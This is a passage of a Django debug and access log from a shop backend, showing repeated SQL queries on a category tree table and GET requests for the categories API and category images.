"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:46:40,747 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:46:40,750 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:46:40,753 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:46:40,756 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:46:40,759 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:46:40,763 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:46:40,766 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:46:40,769 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:46:40,772 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:46:40,776 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:46:40] "GET /api/v1/categories/ HTTP/1.0" 200 8596 [13/Dec/2019 13:46:41] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:41] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:41] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:41] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:41] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:41] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:41] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:41] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:41] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:41] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:41] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:41] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:41] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:41] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:41] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 304 0 [13/Dec/2019 13:46:42] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 304 0 DEBUG 2019-12-13 13:47:13,596 utils 19021 139703090349824 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:47:13,604 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:47:13,607 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:47:13,610 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:47:13,614 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:47:13,617 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:47:13,620 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:47:13,627 utils 19021 139703090349824 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:47:13,631 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:47:13,636 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:47:13,640 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:47:13,644 utils 19021 139703101101824 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 13:47:13,644 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:47:13,654 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:47:13,655 utils 19021 139703101101824 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:47:13,659 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:47:13,672 utils 19021 139703090349824 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) [13/Dec/2019 13:47:13] "GET /api/v1/categories/10 HTTP/1.0" 200 183 DEBUG 2019-12-13 13:47:13,677 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:47:13,682 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:47:13,687 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:47:13,692 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:47:13,697 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:47:13,702 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:47:13,707 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:47:13,713 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:47:13,716 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:47:13,719 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:47:13,723 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:47:13,726 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:47:13,729 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:47:13,732 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:47:13,735 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:47:13,739 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:47:13,742 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:47:13,745 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:47:13,748 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:47:13,752 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:47:13,756 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:47:13,759 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:47:13,762 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:47:13,765 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:47:13,767 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:47:13,770 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:47:13,773 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:47:13,775 utils 19021 139703090349824 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:47:13,778 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:47:13,781 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:47:13,783 utils 19021 139703090349824 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY 